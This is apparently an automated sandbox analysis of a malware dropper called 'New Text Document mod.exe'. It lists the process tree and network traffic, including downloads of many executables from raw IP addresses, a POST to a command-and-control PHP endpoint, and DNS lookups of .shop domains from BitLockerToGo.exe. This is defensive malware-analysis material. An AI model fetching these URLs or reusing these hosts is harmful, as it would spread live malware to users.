        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3128 -childID 1 -isForBrowser -prefsHandle 3120 -prefMapHandle 3116 -prefsLen 22590 -prefMapSize 244680 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b49e308c-5bdf-4c9c-a300-1e8059053733} 4108 "\\.\pipe\gecko-crash-server-pipe.4108" tab
        5⤵
        
        PID:4456
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4072 -childID 2 -isForBrowser -prefsHandle 3968 -prefMapHandle 3600 -prefsLen 29012 -prefMapSize 244680 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f8ac4fd-5979-4e48-b238-8fde6f5ced89} 4108 "\\.\pipe\gecko-crash-server-pipe.4108" tab
        5⤵
        
        PID:5568
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4528 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4548 -prefMapHandle 4540 -prefsLen 29012 -prefMapSize 244680 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {031914e3-d9ae-423c-ab55-1a5ea6747b0b} 4108 "\\.\pipe\gecko-crash-server-pipe.4108" utility
        5⤵
        
        PID:5892
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5264 -childID 3 -isForBrowser -prefsHandle 2400 -prefMapHandle 3012 -prefsLen 26989 -prefMapSize 244680 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bbf09bd2-0b76-4e57-828c-933283427b4f} 4108 "\\.\pipe\gecko-crash-server-pipe.4108" tab
        5⤵
        
        PID:5040
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5420 -childID 4 -isForBrowser -prefsHandle 5428 -prefMapHandle 5432 -prefsLen 26989 -prefMapSize 244680 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cce935e8-8e59-4c91-930a-b9b763ba0470} 4108 "\\.\pipe\gecko-crash-server-pipe.4108" tab
        5⤵
        
        PID:2520
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5400 -childID 5 -isForBrowser -prefsHandle 5408 -prefMapHandle 5416 -prefsLen 26989 -prefMapSize 244680 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {573af255-6e3b-4194-a3bc-9573e4079576} 4108 "\\.\pipe\gecko-crash-server-pipe.4108" tab
        5⤵
        
        PID:3888
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
    3⤵
    PID:2480
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
      4⤵
      PID:5456
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1884 -parentBuildID 20240401114208 -prefsHandle 1808 -prefMapHandle 1800 -prefsLen 23602 -prefMapSize 244680 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f883ecab-be3a-4167-98b8-dd3e5915fb9d} 5456 "\\.\pipe\gecko-crash-server-pipe.5456" gpu
        5⤵
        
        PID:2540
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2376 -parentBuildID 20240401114208 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 24522 -prefMapSize 244680 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e7f9590-4250-4277-878d-aad6e3caf779} 5456 "\\.\pipe\gecko-crash-server-pipe.5456" socket
        5⤵
        
        PID:4504
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2940 -childID 1 -isForBrowser -prefsHandle 2764 -prefMapHandle 2756 -prefsLen 22590 -prefMapSize 244680 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e6873ce-f9a6-4118-a7f0-9e1df3472a62} 5456 "\\.\pipe\gecko-crash-server-pipe.5456" tab
        5⤵
        
        PID:5604
    - - C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
        
        "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\4dfea552-2453-4ac0-878b-830de84ae47f.dmp"
        5⤵
        
        PID:3632
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3608 -childID 2 -isForBrowser -prefsHandle 2884 -prefMapHandle 3032 -prefsLen 29012 -prefMapSize 244680 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7c6f90a-7241-48ef-a32d-19ca6a08ec9a} 5456 "\\.\pipe\gecko-crash-server-pipe.5456" tab
        5⤵
        
        PID:3836
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4544 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4560 -prefMapHandle 4564 -prefsLen 29119 -prefMapSize 244680 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdd4f50f-a57d-4fbd-8644-26c5791e5212} 5456 "\\.\pipe\gecko-crash-server-pipe.5456" utility
        5⤵
        
        PID:5832
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4056 -childID 3 -isForBrowser -prefsHandle 4036 -prefMapHandle 3992 -prefsLen 29119 -prefMapSize 244680 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86066129-5d3a-4031-97bb-d7f66a204a8d} 5456 "\\.\pipe\gecko-crash-server-pipe.5456" tab
        5⤵
        
        PID:5056
    - - C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
        
        "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\e365886e-e189-469d-ac4f-950da13a2da4.dmp"
        5⤵
        
        PID:1136
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3904 -childID 4 -isForBrowser -prefsHandle 4748 -prefMapHandle 4824 -prefsLen 29119 -prefMapSize 244680 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c02126e-8c0e-4aed-b67e-af17d60322b9} 5456 "\\.\pipe\gecko-crash-server-pipe.5456" tab
        5⤵
        
        PID:5284
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4680 -childID 5 -isForBrowser -prefsHandle 4596 -prefMapHandle 4760 -prefsLen 29119 -prefMapSize 244680 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0cbfff9f-3af4-4d52-a343-c88e4b52fa7d} 5456 "\\.\pipe\gecko-crash-server-pipe.5456" tab
        5⤵
        
        PID:1688
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
    3⤵
    PID:5480
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
      4⤵
      PID:5852
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1908 -parentBuildID 20240401114208 -prefsHandle 1848 -prefMapHandle 1840 -prefsLen 23602 -prefMapSize 244680 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1907607-c88d-4b06-8cf0-bc28e3aba8b3} 5852 "\\.\pipe\gecko-crash-server-pipe.5852" gpu
        5⤵
        
        PID:4832
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2384 -prefMapHandle 2380 -prefsLen 24522 -prefMapSize 244680 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e946673f-a7b7-4011-bc36-b6b0f036902b} 5852 "\\.\pipe\gecko-crash-server-pipe.5852" socket
        5⤵
        
        PID:4076
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2040 -parentBuildID 20240401114208 -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 24522 -prefMapSize 244680 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4495fc49-6d87-4a00-9eb6-4acaa590126e} 5852 "\\.\pipe\gecko-crash-server-pipe.5852" gpu
        5⤵
        
        PID:5536
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
    3⤵
    PID:5392
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
      4⤵
      PID:1976
- C:\Users\Admin\AppData\Local\Temp\a\gefox.exe
  "C:\Users\Admin\AppData\Local\Temp\a\gefox.exe"
  2⤵
  PID:5044
- - C:\Users\Admin\AppData\Local\Temp\is-UCTJC.tmp\gefox.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-UCTJC.tmp\gefox.tmp" /SL5="$A01CA,2784848,56832,C:\Users\Admin\AppData\Local\Temp\a\gefox.exe"
    3⤵
    PID:3488
  - - C:\Users\Admin\AppData\Local\Jekky Video Editor\jekkyvideoeditor32_64.exe
      "C:\Users\Admin\AppData\Local\Jekky Video Editor\jekkyvideoeditor32_64.exe" -i
      4⤵
      PID:4888
- C:\Users\Admin\AppData\Local\Temp\a\66e9b62daa62d_xin.exe
  "C:\Users\Admin\AppData\Local\Temp\a\66e9b62daa62d_xin.exe"
  2⤵
  PID:1828
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6020
- C:\Users\Admin\AppData\Local\Temp\a\B.exe
  "C:\Users\Admin\AppData\Local\Temp\a\B.exe"
  2⤵
  PID:3688
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3688 -s 1212
    3⤵
    - Program crash
    PID:5524
- C:\Users\Admin\AppData\Local\Temp\a\ord.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ord.exe"
  2⤵
  PID:5908
- C:\Users\Admin\AppData\Local\Temp\a\kin.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kin.exe"
  2⤵
  PID:6128
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 844
    3⤵
    - Program crash
    PID:5480
- C:\Users\Admin\AppData\Local\Temp\a\euro.exe
  "C:\Users\Admin\AppData\Local\Temp\a\euro.exe"
  2⤵
  PID:932
- C:\Users\Admin\AppData\Local\Temp\a\66e98ff1d44e2_crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\a\66e98ff1d44e2_crypted.exe"
  2⤵
  PID:5372
- C:\Users\Admin\AppData\Local\Temp\a\66e57196bb898_111.exe
  "C:\Users\Admin\AppData\Local\Temp\a\66e57196bb898_111.exe"
  2⤵
  PID:2028
- C:\Users\Admin\AppData\Local\Temp\a\66e805302f63c_otr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\66e805302f63c_otr.exe"
  2⤵
  PID:668
- C:\Users\Admin\AppData\Local\Temp\a\trueburner.exe
  "C:\Users\Admin\AppData\Local\Temp\a\trueburner.exe"
  2⤵
  PID:5884
- C:\Users\Admin\AppData\Local\Temp\a\66e9359d801ce_sbgfds.exe
  "C:\Users\Admin\AppData\Local\Temp\a\66e9359d801ce_sbgfds.exe"
  2⤵
  PID:4892
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 884
    3⤵
    - Program crash
    PID:5168
- C:\Users\Admin\AppData\Local\Temp\a\vtrwh12.exe
  "C:\Users\Admin\AppData\Local\Temp\a\vtrwh12.exe"
  2⤵
  PID:4732
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4124,i,9445584274764997943,12714240264001792460,262144 --variations-seed-version --mojo-platform-channel-handle=4104 /prefetch:8
1⤵
PID:3792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4024 -ip 4024
1⤵
PID:4848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=3004,i,9445584274764997943,12714240264001792460,262144 --variations-seed-version --mojo-platform-channel-handle=3824 /prefetch:3
1⤵
PID:4336

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:2856

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:5548

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:6000

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:1484

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:4948
- C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
  PID:3152

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:5180

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:5764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4892 -ip 4892
1⤵
PID:5452

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2740

Network

DNS

urlhaus.abuse.ch

New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.2.49

p2.shared.global.fastly.net

IN A

151.101.66.49
GET

https://urlhaus.abuse.ch/downloads/text_online/

New Text Document mod.exe

Remote address:

151.101.194.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 443512
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443; frame-src https://www.google.com/recaptcha/; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none'
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Thu, 19 Sep 2024 04:31:06 GMT
ETag: "6c478-62271641819bb"
Cache-Control: max-age=300
Expires: Thu, 19 Sep 2024 04:36:43 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Thu, 19 Sep 2024 04:33:41 GMT
Age: 119
X-Served-By: cache-fra-eddf8230087-FRA, cache-lon420134-LON
X-Cache: HIT, HIT
X-Cache-Hits: 249, 1
X-Timer: S1726720422.744733,VS0,VE1
Vary: Accept-Encoding
GET

http://147.45.44.104/revada/66eb0d09c9f08_Gads.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /revada/66eb0d09c9f08_Gads.exe HTTP/1.1
Host: 147.45.44.104
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:33:42 GMT
Content-Type: application/octet-stream
Content-Length: 11207680
Last-Modified: Wed, 18 Sep 2024 17:25:29 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66eb0d09-ab0400"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/lopsa/66eaf17e9bd9e_Softwarepaxck.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /lopsa/66eaf17e9bd9e_Softwarepaxck.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:33:51 GMT
Content-Type: application/octet-stream
Content-Length: 11352576
Last-Modified: Wed, 18 Sep 2024 15:27:58 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66eaf17e-ad3a00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/malesa/66eaee5323f5d_setup3.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /malesa/66eaee5323f5d_setup3.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:34:04 GMT
Content-Type: application/octet-stream
Content-Length: 232960
Last-Modified: Wed, 18 Sep 2024 15:14:27 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66eaee53-38e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:34:26 GMT
Content-Type: application/octet-stream
Content-Length: 11496960
Last-Modified: Wed, 18 Sep 2024 05:25:37 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66ea6451-af6e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/yuop/66e9b62daa62d_xin.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /yuop/66e9b62daa62d_xin.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:34:50 GMT
Content-Type: application/octet-stream
Content-Length: 360824
Last-Modified: Tue, 17 Sep 2024 17:02:37 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66e9b62d-58178"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/revada/66e98ff1d44e2_crypted.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /revada/66e98ff1d44e2_crypted.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:34:56 GMT
Content-Type: application/octet-stream
Content-Length: 331128
Last-Modified: Tue, 17 Sep 2024 14:19:29 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66e98ff1-50d78"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/yuop/66e6ea133c92f_crypted.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /yuop/66e6ea133c92f_crypted.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:34:57 GMT
Content-Type: application/octet-stream
Content-Length: 351232
Last-Modified: Sun, 15 Sep 2024 14:07:15 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66e6ea13-55c00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/yuop/66e57a08ef022_crypted.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /yuop/66e57a08ef022_crypted.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:34:58 GMT
Content-Type: application/octet-stream
Content-Length: 321536
Last-Modified: Sat, 14 Sep 2024 11:56:56 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66e57a08-4e800"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/revada/66e57196bb898_111.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /revada/66e57196bb898_111.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:34:59 GMT
Content-Type: application/octet-stream
Content-Length: 908303
Last-Modified: Sat, 14 Sep 2024 11:20:54 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66e57196-ddc0f"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/revada/66e805302f63c_otr.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /revada/66e805302f63c_otr.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:35:00 GMT
Content-Type: application/octet-stream
Content-Length: 404992
Last-Modified: Mon, 16 Sep 2024 10:15:12 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66e80530-62e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/prog/66e8771a651d2_voewgngr.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /prog/66e8771a651d2_voewgngr.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:35:01 GMT
Content-Type: application/octet-stream
Content-Length: 290344
Last-Modified: Mon, 16 Sep 2024 10:54:21 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66e80e5d-46e28"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/prog/66e9359d801ce_sbgfds.exe

New Text Document mod.exe

Remote address:

147.45.44.104:80

Request

GET /prog/66e9359d801ce_sbgfds.exe HTTP/1.1
Host: 147.45.44.104

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:35:12 GMT
Content-Type: application/octet-stream
Content-Length: 211496
Last-Modified: Tue, 17 Sep 2024 07:54:05 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66e9359d-33a28"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

49.194.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

49.194.101.151.in-addr.arpa

IN PTR

Response
DNS

104.44.45.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.44.45.147.in-addr.arpa

IN PTR

Response
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

76.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

76.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.100/doun/game.exe

New Text Document mod.exe

Remote address:

185.215.113.100:80

Request

GET /doun/game.exe HTTP/1.1
Host: 185.215.113.100
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Thu, 19 Sep 2024 04:31:31 GMT
ETag: "2b7f9a-62271659b8f1f"
Accept-Ranges: bytes
Content-Length: 2850714
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

100.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

100.113.215.185.in-addr.arpa

IN PTR

Response
GET

http://188.34.184.47/auto/9923765c101c3aa0fca26d109ef9ebe8/231.exe

New Text Document mod.exe

Remote address:

188.34.184.47:80

Request

GET /auto/9923765c101c3aa0fca26d109ef9ebe8/231.exe HTTP/1.1
Host: 188.34.184.47
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 04:34:04 GMT
Content-Type: application/octet-stream
Content-Length: 11706613
Last-Modified: Thu, 19 Sep 2024 04:29:54 GMT
Connection: keep-alive
ETag: "66eba8c2-b2a0f5"
Accept-Ranges: bytes
DNS

47.184.34.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

47.184.34.188.in-addr.arpa

IN PTR

Response

47.184.34.188.in-addr.arpa

IN PTR

static4718434188clientsyour-serverde
GET

http://185.215.113.103/

game.exe

Remote address:

185.215.113.103:80

Request

GET / HTTP/1.1
Host: 185.215.113.103
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.103/e2b1563c6670f193.php

game.exe

Remote address:

185.215.113.103:80

Request

POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAE
Host: 185.215.113.103
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

103.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.113.215.185.in-addr.arpa

IN PTR

Response
DNS

keennylrwmqlw.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

keennylrwmqlw.shop

IN A

Response
DNS

licenseodqwmqn.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

licenseodqwmqn.shop

IN A

Response
DNS

tendencctywop.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

tendencctywop.shop

IN A

Response
DNS

tesecuuweqo.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

tesecuuweqo.shop

IN A

Response
DNS

relaxatinownio.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

relaxatinownio.shop

IN A

Response
DNS

reggwardssdqw.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

reggwardssdqw.shop

IN A

Response
DNS

eemmbryequo.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

eemmbryequo.shop

IN A

Response
DNS

eemmbryequo.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

eemmbryequo.shop

IN A
DNS

tryyudjasudqo.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

